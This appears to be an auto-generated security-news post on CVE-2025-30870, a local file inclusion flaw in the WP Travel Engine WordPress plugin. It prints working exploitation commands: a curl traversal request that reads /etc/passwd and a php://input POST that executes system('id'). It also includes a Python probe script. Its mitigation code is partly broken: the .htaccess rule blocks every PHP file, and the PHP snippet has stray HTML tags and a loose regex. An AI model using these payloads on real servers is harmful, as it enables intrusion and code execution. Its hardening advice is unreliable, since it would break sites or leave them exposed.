WordPress WP Travel Engine, PHP Local File Inclusion, CVE-2025-30870 (Critical)

Listen to this Post

How CVE-2025-30870 Works

The vulnerability stems from improper sanitization of user-supplied input in WP Travel Engine’s file inclusion functions. Attackers exploit this by manipulating parameters (e.g., $_GET/$_POST) to inject malicious paths, enabling unauthorized access to local files (e.g., /etc/passwd) or remote code execution via PHP wrappers (php://input). The lack of validation allows directory traversal (e.g., ../../../), leading to server compromise.

DailyCVE Form

Platform: WordPress
Version: ≤6.3.5
Vulnerability: Local File Inclusion
Severity: Critical
Date: 05/28/2025

Prediction: Patch by 07/15/2025

What Undercode Say:

Exploitation Commands:

1. Basic LFI Test:

curl "http://target.com/?file=../../../../etc/passwd"

2. PHP Wrapper Exploit:

curl -X POST --data "<?php system('id'); ?>" "http://target.com/?file=php://input"

Protection Measures:

1. .htaccess Mitigation:

<FilesMatch "\.(php|inc|log)$">
Order Deny,Allow
Deny from all
</FilesMatch>

2. PHP Hardening:

// Sanitize input
$file = basename($<em>GET['file']);
if (!preg_match('/^[a-z0-9</em>-]+.php$/i', $file)) {
die("Invalid file");
}

Detection Script (Python):

import requests
vuln_url = "http://target.com/?file=../../../../etc/passwd"
response = requests.get(vuln_url)
if "root:x:" in response.text:
print("[!] Vulnerable to LFI")

Analytics:

  • Attack Surface: High (Widely used plugin)
  • Exploit Complexity: Low (No auth required)
  • Mitigation Priority: Immediate

Patch Verification:

Post-patch check
grep -r "basename(" /var/www/wp-content/plugins/wp-travel-engine/

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top